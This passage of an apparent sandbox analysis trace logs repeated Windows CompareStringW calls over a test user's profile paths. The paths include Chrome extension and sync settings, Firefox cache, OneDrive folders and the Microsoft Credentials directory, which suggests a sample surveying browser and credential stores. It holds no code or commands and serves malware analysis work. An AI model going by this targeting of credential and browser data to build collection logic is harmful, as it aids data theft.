lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\", cchCount2=126) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\", cchCount2=126) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\", cchCount2=126) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\", cchCount2=126) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\", cchCount2=105) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\", cchCount2=105) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\", cchCount2=105) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\", cchCount2=105) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount2=125) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount1=60, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount2=60) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount2=73) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount2=73) returned 1 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount2=73) returned 3 [0301.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount2=73) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount2=73) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\", cchCount2=73) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\", cchCount2=73) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\", cchCount2=73) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\", cchCount2=73) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\", cchCount2=73) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\", cchCount1=60, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount2=58) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount2=58) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\", cchCount1=105, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount2=58) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount2=58) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount2=58) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 3 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount2=174) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 